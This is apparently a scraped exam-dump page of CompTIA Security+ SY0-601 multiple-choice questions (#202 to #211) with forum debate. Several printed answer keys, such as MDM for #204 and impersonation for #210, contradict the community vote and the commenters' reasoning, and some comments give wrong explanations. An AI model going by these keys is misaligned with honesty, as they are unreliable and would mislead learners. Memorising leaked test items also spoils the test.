"Which of the following prevents an employee from visiting an inappropriate website"

.....which would somewhat make more sense. An acceptable use policy (AUP) is a document that outlines the rules and restrictions employees
must follow in regard to the company's network, software, internet connection and devices. The employee shouldn't access the inappropriate
website as it would go against proper use of the company network.

================
Helpful Info I Guess

NDA (Non-disclosure agreement) - a binding contract between two or more parties that prevents sensitive information from being shared with
others.

Separation of Duty - refers to the principle that no user should be given enough privileges to misuse the system on their own.

Job rotation - A concept that has employees rotate through different jobs to learn the procedures and processes in each. From a security
perspective, job rotation helps to prevent or expose dangerous shortcuts or even fraudulent activity.
upvoted 3 times

  Sir_Learnalot 2 months, 3 weeks ago


Somtimes I get the feeling CompTIA uses a random sentence generator for their questions -.-
upvoted 4 times

  lordguck 3 months ago


D it's the only answer which leads to "prevent" by proxy as the IT grunts must do the work to make it a reality. B+C are just pieces of paper,
deterrent controls at best.
upvoted 1 times

  G4ct756 3 months, 1 week ago


Selected Answer: D
D? question asked which choice prevent someone from seeing a colleague who is visiting an inappropriate website.
for B Job rotation policy, someone might takeover the desktop and view browser history.
Not NDA, since it is an agreement for viewing sensitive data.
Not AUP, an usage agreement between user and company, which the colleague violated.
left with D separation of duties, the employee cant see the colleague's activity.
upvoted 3 times

  Holysurprise 3 months, 2 weeks ago


This is perhaps the most poorly worded question I have come across. From how it reads it sounds like what stops one user from looking at or
talking to another user while they are accessing said inappropriate site.
upvoted 4 times

  kennyleung0514 3 months, 3 weeks ago


i don't understand what the question asking about
how to prevent a person to look at another person's screen ?
hmm, I think each of them should have a dedicated room with door-lock ?
upvoted 1 times

  Iphy23 3 months, 2 weeks ago


lots of laughter
upvoted 1 times

  andrizo 3 months, 3 weeks ago


No not shoulder surfing, inappropriate content
upvoted 1 times

  alayeluwa 3 months, 3 weeks ago


Terrible question smh
upvoted 3 times

  deeden 4 months, 1 week ago


Wait a minute, I'm confused. So by implementing AUP, we're preventing Edward from seeing Edmund, because Edmund is visiting porn sites?

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 352/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Or maybe...
Which of the following prevents an employee from visiting an inappropriate website?
upvoted 1 times
  lucasvs_ 4 months, 2 weeks ago
Selected Answer: C
In terms of enforcing an AUP in cyber security, internet management software ensures that high-risk websites are not visited on managed
computers. Software for monitoring employee computer use will provide you with tangible insights into the effectiveness of your acceptable use
policies.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 353/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #202 Topic 1

A user reports falling for a phishing email to an analyst. Which of the following system logs would the analyst check FIRST?

A. DNS

B. Message gateway

C. Network

D. Authentication

Correct Answer: A

Community vote distribution


A (35%) B (33%) D (28%) 4%

  Gino_Slim Highly Voted  3 months, 1 week ago


This is a also a dumb question
upvoted 17 times

  stoneface Highly Voted  5 months ago


Selected Answer: A
We want to see DNS logs to see where the users was taken
upvoted 14 times

  db97 4 months, 1 week ago


But your assuming that he clicked on a link and the question does not specify that
upvoted 4 times

  Sandon 2 months, 4 weeks ago


It does specify that
upvoted 1 times

  RonWonkers 4 months, 1 week ago


User report falling for the phishing mail
upvoted 6 times

  i_bird 4 months, 1 week ago


any elaboration will be appreciated..
upvoted 1 times

  ronniehaang Most Recent  4 days, 1 hour ago


Selected Answer: B
The analyst would check the message gateway logs FIRST. The message gateway logs provide information on all incoming and outgoing email
traffic. This log will contain information on the phishing email the user reported falling for, including the time and date the email was received, the
sender, and the recipient. This information can be used to verify the user's claim, track the source of the phishing email, and prevent similar
attacks in the future.
upvoted 1 times

  Ranaer 4 days, 5 hours ago


Selected Answer: D
I was initially leaning towards DNS, but not all phishing emails use links. Some use harmful attachments, such as macro embedded files or files
with double extension to trick users into clicking them.
When we take into account that there are other ways of falling for a phishing email, DNS doesnt make much sense anymore.
Message gateway will give us the information where the email is from. I dont believe we need that.
Network logs might shows us if there is any abnormal traffic, but that wouldnt be useful, if the infected machine is only 1 and its not beaconing or
trying to spread trough the network.
So we are left with Authentication. It doesnt sound too convincing either, but there might be going privilage escalation attempts, which we should
be able to see within the auth logs.

The explanation is flimsy, but the question is honestly awful so....


upvoted 2 times

  Ranaer 4 days, 5 hours ago


Upon some further examination, I would like to retract my explanation for Message gateway. The message gateway could provide us with
information if anyone else within the organization has received the same email. I dont think that is much help, but it still gives a bit more to that
answer.
I still think the reasonable answers are DNS or Authentication. So its pretty much a coinflip.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 354/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  ZDW 1 week, 4 days ago


Selected Answer: B
Nothing in this question says what information was given away or if a link was clicked. So you wouldn't just go blindly searching DNS or
authentication logs you would need to see the email first, what it is asking for, what who all it may have gone too etc.
upvoted 1 times

  rumblerally 3 weeks, 1 day ago


Imagine a situation where a user falls for a phishing email and has given their credentials away to a bad actor. PRIORITY NUMBER 1 IS TO SEE
IF SOMEONE IS CURRENTLY INSIDE THE ACCOUNT. That is the most crucial part of this entire question. Who gives a shit about who did it... we
need to know if someone actually breached the account! They could be in the process of stealing information, etc.
upvoted 3 times

  rumblerally 3 weeks, 1 day ago


The answer is authentication logs. Don't overthink it. I have worked in environments where this exact situation has occurred and auth logs are
the number 1 priority. Everything else is dealt with later when an investigation occurs and time is no longer as critical.
upvoted 2 times

  viksap 1 month, 2 weeks ago


Selected Answer: A
Leaning towards DNS
upvoted 1 times

  [Removed] 1 month, 2 weeks ago


Selected Answer: A
Definitely DNS
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The analyst would check the authentication logs first.
Authentication logs typically record information about login attempts, such as the time, date, and outcome of the attempt, as well as the
username and IP address of the user who attempted to log in. These logs can help the analyst determine whether the user's account was
accessed without their permission, and can provide important information for investigating the phishing incident.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Not sure about this. I think the answer is B:

The analyst should check the message gateway logs first. A message gateway is a system that processes and routes email messages, and
the message gateway logs would contain information about the phishing email that the user received. The logs would typically include details
such as the sender and recipient of the email, the time it was sent, and any actions that were taken by the message gateway (such as marking
the email as spam or quarantining it). This information can help the analyst understand how the user received the phishing email and take
appropriate action to prevent similar incidents in the future.
upvoted 2 times

  Blueteam 2 months, 1 week ago


Another bad question.
First thing should be checked is the email. What kind of phishing is this?
Asked the user to click on a link? sign in to a website? call a phone number? share credentials?
The closest answer is checking the message gateway.
upvoted 2 times

  y3t1 2 months, 1 week ago


I think D. I'm saying this because the first thing you should check is if the user's credentials have been breached allowing the attacker through to
whatever the user has access to. Could include SSO VPN, RDS, etc. Change the user's credentials, and then proceed to confirm how the
message got through, what the message was, etc.
upvoted 2 times

  JSOG 2 months, 2 weeks ago


Selected Answer: C
from this site, the ans is networking. may be right or not. judge for yourself https://www.dumpsmate.com/sy0-601-comptia-securityp-exam-
2021-question.html
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: D
For me this question does not give enough information for the case. Depending on what kind of phishing this was it could have different impacts.
Was it a Credential Harvesting attacke, go and check the authentication logs. Was it a download link for something like malware, you should
check Network and DNS logs to see if any C2 is happening, and to understand the origin of the attack and maybe prevent further attacks you
should also check the message gateway logs...authentication logs is the most critical to me, as stolen credentials and a resulting malicious login
would be a big red flag. But I´m happy to here other opinions on this
upvoted 3 times

  Knowledge33 3 months ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 355/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: B
DNS is false. In fact, The user directly report the SPAM. He didn't click to anything. It means as he didn't try to access a malicious website, no
DNS query was made.

An Email Gateway, or a Secure Email Gateway (SEG), is a mail server that analyzes an organization’s incoming and outgoing emails before they
reach the internal mail server. All emails pass through this Email Gateway and are checked for potential security threats. An Email Gateway,
hence, acts as a firewall for emails.

https://www.educative.io/answers/what-is-an-email-gateway
upvoted 4 times

  Sandon 2 months, 4 weeks ago


"falling for a phishing email" = he clicked it
upvoted 4 times

  zharis 3 months, 1 week ago


Selected Answer: C
what about Network as the answer
upvoted 1 times

  Tomtom11 3 months, 1 week ago


DNS logs, when enabled, can contain a record for every query and response.
This can be a treasure trove of information for an investigator because it can
reveal malware calling out to its command-and-control server, or data
transfers to non-company locations. Analysis of DNS logs can show IP
addresses and domain names that your systems should be communicating
with as well as ones they shouldn’t be communicating with. In cases where
an attacker or malware is doing the communication, these communication
channels may be next to invisible on the network, but the DNS system, as
part of the network architecture, can log the activity. This is one of the
reasons why DNS logs are some of the most valuable logs to import into a
SIEM system.
upvoted 3 times

  MarciaL 3 months, 2 weeks ago


C. Network
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 356/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #203 Topic 1

An attacker has determined the best way to impact operations is to infiltrate third-party software vendors. Which of the following vectors is being
exploited?

A. Social media

B. Cloud

C. Supply chain

D. Social Engineering

Correct Answer: C

Community vote distribution


C (86%) 14%

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
The attacker is exploiting the supply chain vector. The supply chain refers to the series of processes and organizations involved in the production,
distribution, and delivery of goods and services. By infiltrating third-party software vendors, the attacker is attempting to gain access to the
supply chain and compromise the software that is used by the organization. This can allow the attacker to launch attacks, steal sensitive data, or
disrupt operations by inserting malicious code into the software. Social media, cloud, and social engineering are not directly related to the supply
chain and would not be effective for infiltrating third-party software vendors.
upvoted 1 times

  JSOG 2 months, 2 weeks ago


Selected Answer: D
going with D too
upvoted 1 times

  Sandon 1 week, 3 days ago


That ain't it buddy
upvoted 1 times

  MarciaL 3 months, 2 weeks ago


I'm going with D. Social Engineering
upvoted 3 times

  RonWonkers 4 months, 1 week ago


Selected Answer: C
C is correct
upvoted 1 times

  serginljr 4 months, 3 weeks ago


Selected Answer: C
C it's correct answer
upvoted 4 times

  gen2dee 4 months, 2 weeks ago


explain pls
upvoted 1 times

  i_bird 4 months, 1 week ago


Supply chain attacks are an emerging kind of threat that target software developers and suppliers. The goal is to access source codes,
build processes, or update mechanisms by infecting legitimate apps to distribute malware.

https://www.google.com/url?
sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwjcye66gKv6AhXWjIkEHZ2BDAMQFnoECAUQAw&url=https%3A%2F%2Flearn.mi
crosoft.com%2Fen-us%2Fmicrosoft-365%2Fsecurity%2Fintelligence%2Fsupply-chain-
malware%23%3A~%3Atext%3DSupply%2520chain%2520attacks%2520are%2520an%2Clegitimate%2520apps%2520to%2520distribut
e%2520malware.&usg=AOvVaw3RhD4fF-pUIEOJD0fGVjn7
upvoted 5 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 357/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #204 Topic 1

An organization would like to give remote workers the ability to use applications hosted inside the corporate network. Users will be allowed to use
their personal computers, or they will be provided organization assets. Either way, no data or applications will be installed locally on any user
systems. Which of the following mobile solutions would accomplish these goals?

A. VDI

B. MDM

C. COPE

D. UTM

Correct Answer: B

Community vote distribution


A (93%) 7%

  Joe1984 Highly Voted  5 months ago


Selected Answer: A
MDM would require something to be installed. VDI, virtual desktop infrastructure, would allow employees to use run apps on the company
network without installing locally.
upvoted 19 times

  ronniehaang Most Recent  4 days, 1 hour ago


Selected Answer: A
A. VDI (Virtual Desktop Infrastructure) would accomplish these goals. VDI provides remote workers with access to a virtual desktop that is hosted
on the organization's servers. The virtual desktop is accessed over the internet, and the user interacts with it as if it were installed locally on their
computer. No data or applications are installed on the user's system, as they are all hosted on the organization's servers. The user's computer
simply provides a display and input interface. This solution meets the requirement that no data or applications be installed locally on the user's
system.
upvoted 1 times

  RvR109 1 month ago


Selected Answer: A
"Remote workers" and "no data or applications will be installed locally" definitely leans toward a VDI (Virtual Desktop Infrastructure).
upvoted 1 times

  EubertT 2 months, 3 weeks ago


Please read the last sentence "Which of the following mobile solutions would accomplish these goals? So, Mobile Device Management or MDM.
This management can be very important if users are bringing their own devices into the workplace and then we're putting sensitive company
information on the user's own device.
upvoted 2 times

  Sandon 1 week, 2 days ago


That's not what MDM does
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: B
VDI stands no chance. Mobile device management which processes and supports technologies for tracking, controlling and securing the
organizations mobile infrastructure
upvoted 2 times

  Sandon 1 week, 2 days ago


You couldn't be more wrong
upvoted 1 times

  Iphy23 3 months, 2 weeks ago


The hint is the mobile solutions... so MDM
upvoted 1 times

  Sandon 1 week, 2 days ago


negative ghostrider
upvoted 1 times

  [Removed] 3 months, 3 weeks ago


Either way, no data or applications will be installed locally on any user systems=vdi
upvoted 1 times
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 358/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  VendorPTS 4 months ago


Selected Answer: A
- remote workers the ability to use applications hosted inside the corporate network
- allowed to use their personal computers, or they will be provided organization assets
- no data or applications will be installed locally on any user systems
- Which mobile solutions would accomplish these goals?

None, at least on their own. Of the options available, it seems like it has to be VDI.
upvoted 2 times

  Dface 4 months, 1 week ago


Key to this question, "Which of the following mobile solutions would accomplish these goals?" MDM is correct
upvoted 1 times

  RonWonkers 4 months, 1 week ago


Selected Answer: A
100% VDI
upvoted 1 times

  Strykar 4 months, 1 week ago


Selected Answer: A
Example: Remote Desktop virtual apps.
upvoted 1 times

  Danalyst 4 months, 3 weeks ago


Selected Answer: A
VDI is used in reality., could be COPE but that wouldnt account for avoiding installation on private devices.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 359/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #205 Topic 1

Which of the following is used to ensure that evidence is admissible in legal proceedings when it is collected and provided to the authorities?

A. Chain of custody

B. Legal hold

C. Event log

D. Artifacts

Correct Answer: A

Community vote distribution


A (88%) 13%

  serginljr Highly Voted  4 months, 3 weeks ago


Selected Answer: A
A is correct
upvoted 5 times

  rodwave Most Recent  2 months, 3 weeks ago


Selected Answer: A
Answer: Chain of custody

A chain of custody is a chronological paper trail documenting when, how, and by whom individual items of physical or electronic evidence—such
as cell phone logs—were collected, handled, analyzed, or otherwise controlled during an investigation.
upvoted 2 times

  RonWonkers 4 months, 1 week ago


Selected Answer: D
Is this not artifacts in the form of a hash/checksum to validate data integrity?
upvoted 1 times

  RonWonkers 4 months, 1 week ago


Scratch this, i'm going with A
upvoted 5 times

  ostralo 3 months, 3 weeks ago


Artifacts are tracks that get left behind. You could associate them with the footprints of the end-user or hacker.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 360/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #206 Topic 1

The Chief Information Security Officer (CISO) of a bank recently updated the incident response policy. The CISO is concerned that members of the
incident response team do not understand their roles. The bank wants to test the policy but with the least amount of resources or impact. Which
of the following BEST meets the requirements?

A. Warm site failover

B. Tabletop walk-through

C. Parallel path testing

D. Full outage simulation

Correct Answer: C

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: B
Tabletoppp
upvoted 11 times

  RonWonkers Most Recent  4 months, 1 week ago


Selected Answer: B
B is correct
upvoted 1 times

  redsidemanc2 4 months, 3 weeks ago


speaking is free.

info :
Tabletop exercises
• Performing a full-scale disaster drill can be costly
– And time consuming
• Many of the logistics can be determined through
analysis
– You don’t physically have to go through a
disaster or drill
• Get key players together for a tabletop exercise
– Talk through a simulated disaster
upvoted 2 times

  Strykar 4 months, 1 week ago


Source: Professor Messer :)
upvoted 1 times

  redsidemanc2 4 months, 3 weeks ago


Tabletop is anwser here
upvoted 1 times

  FT1 5 months ago


C-Parallel testing is a semi-automated testing process that relies on cloud technology and virtualization to perform tests against several
configurations at the same time. The goal of this process is to resolve the limitations of time and budget while still assuring quality.
upvoted 1 times

  derfnick 5 months ago


B. Because of "least amount of resources or impact"
upvoted 3 times

  Wildstar 5 months, 1 week ago


I can't even find "parallel path testing" in the Study Guide I'm using...
upvoted 3 times

  KetReeb 5 months ago


Probably: B: Tabletop Walk-through (or plain walkthroughs): Walkthroughs examine the actual steps that take place associated with a process,
procedure, or event... Walkthroughs are commonly used by audit personnel to ensure proper processes are being followed.
So this covers confirming the roles with minimal impact to production.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 361/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Joe1984 5 months ago


I googled it and it seems to be the correct answer.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 362/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #207 Topic 1

Which of the following control types fixes a previously identified issue and mitigates a risk?

A. Detective

B. Corrective

C. Preventative

D. Finalized

Correct Answer: C

Community vote distribution


B (86%) 14%

  stoneface Highly Voted  5 months ago


Selected Answer: B
Corrective is correct
upvoted 12 times

  Renfri Highly Voted  1 month, 3 weeks ago


This question can be interpreted as:
Preventative = preventing this previous issue from happening again
Corrective = correcting this issue that has happened

FUCK YOU COMPTIA


upvoted 6 times

  [Removed] 1 month, 3 weeks ago


Lol.. Same thought.. But I will go with Corrective… Whether is wrong or not…
upvoted 1 times

  BluEric Most Recent  2 months, 3 weeks ago


Selected Answer: B
For me, the keyword here is "fixes" , thus Corrective must be the right choice.
upvoted 1 times

  carpathia 2 months, 3 weeks ago


I am assuming is B, even thogh they use misleading words like "previously" which could mean something that happened in the past.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: B
Answer: Corrective

Corrective controls that remediate security issues that have already occurred. Restoring backups after a ransomware attack is an example of a
corrective control.
upvoted 2 times

  Tomtom11 3 months, 1 week ago


Selected Answer: C
Preventative
A preventative control is one that prevents specific actions from occurring,
such as a mantrap prevents tailgating. Preventative controls act before an
event, preventing it from advancing. A firewall is an example of a
preventative control, as it can block access to a specific resource.
upvoted 1 times

  tsqizel 2 months, 3 weeks ago


Yes but the question states "fixes a previously identified issue" whilst mitigating a risk, Preventative is preventing and mitigating future risk
whereas Corrective is patching an issue that has occurred and mitigating its risk. Cheers =)
upvoted 2 times

  Iphy23 3 months, 2 weeks ago


so which is going to be the correct answer according to the marking scheme... cos its becoming confusing now
upvoted 2 times

  abrilo 3 months, 2 weeks ago


A corrective control is designed to mitigate any damage that was occurred because of a security event. ...pro messer
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 363/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  Zenvega 4 months ago
Selected Answer: C
Im thinking Wouldnt this be C? Corrective resolves the issue but Preventative resolves and mitigates future risk.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Negative, prevention mitigates future risk. Corrective patches vulnerabilities
upvoted 1 times

  Heroofatea 4 months, 1 week ago


Selected Answer: C
Corrective action prevents recurrence, while preventive action prevents occurrence. We dealing with risk, not incident.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Previous issue tells me this is a low priority incident
upvoted 1 times

  RonWonkers 4 months, 1 week ago


Selected Answer: B
Corrective is correct
upvoted 1 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: B
Corrective controls include any measures taken to repair damage or restore resources and capabilities to their prior state following an
unauthorized or unwanted activity
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 364/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #208 Topic 1

An analyst is reviewing logs associated with an attack. The logs indicate an attacker downloaded a malicious file that was quarantined by the AV
solution. The attacker utilized a local non-administrative account to restore the malicious file to a new location. The file was then used by another
process to execute a payload.
Which of the following attacks did the analyst observe?

A. Privilege escalation

B. Request forgeries

C. Injection

D. Replay attack

Correct Answer: C

Community vote distribution


C (89%) 11%

  stoneface Highly Voted  5 months ago


Selected Answer: C
"The file was then used by another process to execute a payload." -> Injection
upvoted 20 times

  stonefaces_kitten 2 months ago


I agree, thank you (:
upvoted 1 times

  deeden 4 months, 1 week ago


This is brilliant. Here's some additional material which might be of interest..
https://attack.mitre.org/techniques/T1055/012/
upvoted 1 times

  deeden 4 months, 1 week ago


But ultimately the goal is to escalate privileges.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


But they didn't escalate privileges. Which is stated in the question.
upvoted 1 times

  bragefagstad97 3 months, 4 weeks ago


This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security
context) of the injecting process.
upvoted 1 times

  ronniehaang Most Recent  4 days, 1 hour ago


Selected Answer: A
The analyst observed a Privilege escalation attack.

In a Privilege escalation attack, an attacker gains access to resources or information that are not normally available to their user account. In this
case, the attacker utilized a non-administrative account to restore a malicious file that was quarantined by the AV solution, thereby elevating their
privilege level and allowing the file to execute its payload.
upvoted 1 times

  Gary_Phillips_2007 1 month, 2 weeks ago


This is ChatGPT’s response:

Based on the information provided, the analyst observed an attack that involved privilege escalation.

In this attack, the attacker used a local non-administrative account to restore the malicious file to a new location, which likely required elevating
their privileges to do so. The attacker then used the restored file to execute a payload, indicating that they were able to successfully escalate
their privileges and gain greater access to the system.

Option A, privilege escalation, is therefore the correct answer.

Option B, request forgeries, involves manipulating requests to a server or system in order to gain unauthorized access or perform actions that
would not normally be allowed.

Option C, injection, refers to the injection of malicious code or data into a system, such as through SQL injection or cross-site scripting (XSS).

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 365/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Option D, replay attack, involves reusing captured authentication or other data in order to gain unauthorized access to a system or network.
upvoted 1 times

  Sandon 1 week, 2 days ago


If you push ChatGPT further you get this.

"You are correct that the information provided in the question states that the attacker used a non-administrative account, rather than
escalating privileges. My apologies for any confusion. In this scenario, it is not specified which type of attack the analyst observed. The
information provided in the logs could indicate multiple types of attacks such as a malicious file being downloaded, quarantine bypass and
payload execution."
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
I see that many of you not choosing A. Please read carefully.

The analyst observed a privilege escalation attack. Privilege escalation occurs when an attacker gains access to higher-level privileges than they
are authorized to have. This can allow the attacker to perform actions that would normally be restricted, such as modifying system files or
accessing sensitive data. In the scenario you described, the attacker used a local non-administrative account to download a malicious file and
restore it to a new location. This required the attacker to have higher-level privileges than the non-administrative account would normally have,
indicating that they had successfully escalated their privileges. The attacker then used the malicious file to execute a payload, demonstrating the
additional capabilities they gained through privilege escalation.
upvoted 1 times

  viksap 1 month, 2 weeks ago


They used NON Admin account
upvoted 1 times

  Sandon 1 month, 3 weeks ago


Wrong, again. It explicitly says they used a local non-admin account.
upvoted 1 times

  Nome02 2 months ago


Correct B : Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF
(sometimes pronounced sea-surf[1]) or XSRF, is a type of malicious exploit of a website where unauthorized
commands are submitted from a user that the web application trusts.[2] There are many ways in which a
malicious website can transmit such commands; specially-crafted image tags, hidden forms,
and JavaScript XMLHttpRequests, for example, can all work without the user's interaction or even knowledge.
Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust
that a site has in a user's browser.[3] In a CSRF attack, an innocent end user is tricked by an attacker into
submitting a web request that they did not intend. This may cause actions to be performed on the website that
can include inadvertent client or server data leakage, change of session state, or manipulation of an end user's
account
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it
upvoted 1 times

  J_Ark1 2 months, 3 weeks ago


Selected Answer: C
key words "non-admin account" and "execute a payload " hence C correct
upvoted 2 times

  G4ct756 3 months, 1 week ago


Selected Answer: A
this a privilege escalation. Attacker perform horizontal PE to move the files, then use process with higher privilege to execute the file.
upvoted 1 times

  Sandon 2 months, 4 weeks ago


Wrong, read it again
upvoted 2 times

  MarciaL 3 months, 2 weeks ago


B. Request forgeries
upvoted 1 times

  p610878 3 months, 3 weeks ago


Selected Answer: C
An injection attack is any exploitation that allows an attacker to submit code to a target
system to modify its operations and/or poison and corrupt its data set. This is also called
remote code attacks or remote code exploits.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 366/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #209 Topic 1

A security engineer must deploy two wireless routers in an office suite. Other tenants in the office building should not be able to connect to this
wireless network.
Which of the following protocols should the engineer implement to ensure the STRONGEST encryption?

A. WPS

B. WPA2

C. WAP

D. HTTPS

Correct Answer: B

Community vote distribution


B (100%)

  passmemo Highly Voted  4 months, 2 weeks ago


Selected Answer: B
STRONGEST
upvoted 5 times

  alayeluwa 3 months, 3 weeks ago


Very very lol
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 367/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #210 Topic 1

An attacker browses a company's online job board attempting to find any relevant information regarding the technologies the company uses.
Which of the following BEST describes this social engineering technique?

A. Hoax

B. Reconnaissance

C. Impersonation

D. Pretexting

Correct Answer: C

Community vote distribution


B (96%) 4%

  Joe1984 Highly Voted  5 months ago


Selected Answer: B
If you are just "Browsing", collecting information, wouldn't this be Reconnaissance?
upvoted 19 times

  BigLao 3 months, 1 week ago


It says browsing online job board- the attacker is impersonating a job-seeker.

How do you see it?


upvoted 1 times

  rodwave 2 months, 3 weeks ago


An online job board is data available to the public (OSINT) so anybody can access this information. If there's any technologies listed, then
the company is fine with this information being known.

It could be impersonation as a job-seeker if the attacker had applied for the job, gotten an interview and during the interview the company
somehow disclosed all of their technologies that the fake job-seeker was looking for. This seems unlikely.
upvoted 2 times

  stoneface 5 months ago


This is Passive Reconnaissance. So YESSS
upvoted 5 times

  Sir_Learnalot Most Recent  2 months, 3 weeks ago


Selected Answer: B
This is OSINT (reconnaissance)
upvoted 2 times

  abod050 2 months, 4 weeks ago


Selected Answer: B
for sure B
upvoted 2 times

  zharis 3 months, 1 week ago


Selected Answer: C
Reconnaissance which is an assessment activity doesn't make any sense to the question
upvoted 1 times

  Sandon 1 week, 2 days ago


Impersonation is what doesn't make sense
upvoted 1 times

  mark9999 3 months, 1 week ago


Who the hell is providing the answers to Exam Topics? This is obviously meant to be passive recon. It's an online job board, doesn't say you
have to login so why would you be impersonating anyone. Don't overthink it.
upvoted 3 times

  Iphy23 3 months, 2 weeks ago


this material seem to be confusing me rather than help me prepare for the exam!!!
upvoted 2 times

  Mperor 2 months, 3 weeks ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 368/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Was so confident from the beginning . Now i am getting more confused bro. This is clearly reconnnaissance
upvoted 1 times

  alayeluwa 3 months, 3 weeks ago


Selected Answer: B
Recoooooooooooooon
upvoted 2 times

  Fitzd 4 months, 3 weeks ago


Other common methods of passive reconnaissance include advanced Google searches, sifting through information stored on discarded devices,
and impersonating users.
upvoted 1 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: B
has to be B .. Impersonation is a form of social engineering attack when the attacker pretends to be someone else.. nothing related to the
question here.
upvoted 2 times

  BigLao 3 months, 1 week ago


What if we look at it as the attacker pretending to be someone looking for a job since it says browsing a company's online job board
upvoted 1 times

  Bman3001 5 months ago


The answer is Recon.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 369/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #211 Topic 1

During an incident response process involving a laptop, a host was identified as the entry point for malware. The management team would like to
have the laptop restored and given back to the user. The cybersecurity analyst would like to continue investigating the intrusion on the host. Which
of the following would allow the analyst to continue the investigation and also return the laptop to the user as soon as possible?

A. dd

B. memdump

C. tcpdump

D. head

Correct Answer: B

Community vote distribution


A (86%) 14%

  stoneface Highly Voted  5 months ago


Going to the exam - Wish me LUCK!
upvoted 59 times

  Thanks_stoneface 1 day, 20 hours ago


I thought you wrote the exam and were reviewing the questions for fun
upvoted 1 times

  Rusher 3 months ago


How did your exam go my friend? I was looking for your answers once reviewing the comments... I'm pretty sure you did well!
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


In stonface we trust
upvoted 8 times

  j0n45 4 months, 2 weeks ago


How did it go?
upvoted 2 times

  ahmadawni Highly Voted  4 months, 3 weeks ago


good luck guys i have the exam after tomorrow i would really want to thank this community and tell you all that i love you and wish you the best
luck :)
upvoted 14 times

  Gino_Slim 3 months, 1 week ago


IO hope you did well my friend. This website doesn't allow reply notifications but we are wishing you well.
upvoted 1 times

  ronniehaang Most Recent  4 days, 1 hour ago


Selected Answer: A
A. dd

The analyst should create a disk image of the laptop using the "dd" utility to preserve the state of the host and be able to continue their
investigation. This process involves creating an exact binary copy of the hard drive, including all data, partitions, and file systems. The analyst
can then restore the laptop to its original state by writing the image back to the hard drive. The disk image can be analyzed in a safe and isolated
environment to determine the cause of the intrusion and prevent future attacks.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
The analyst can use dd to continue the investigation and also return the laptop to the user as soon as possible. dd is a command-line utility that
is used to create a disk image of a storage device. By creating a disk image of the laptop using dd, the analyst can preserve the current state of
the device and continue the investigation without disrupting the user or altering the contents of the laptop. This would allow the analyst to
continue the investigation and also return the laptop to the user as soon as possible. memdump, tcpdump, and head are not directly related to
creating a disk image of a storage device and would not be effective for continuing the investigation while also returning the laptop to the user.
upvoted 3 times

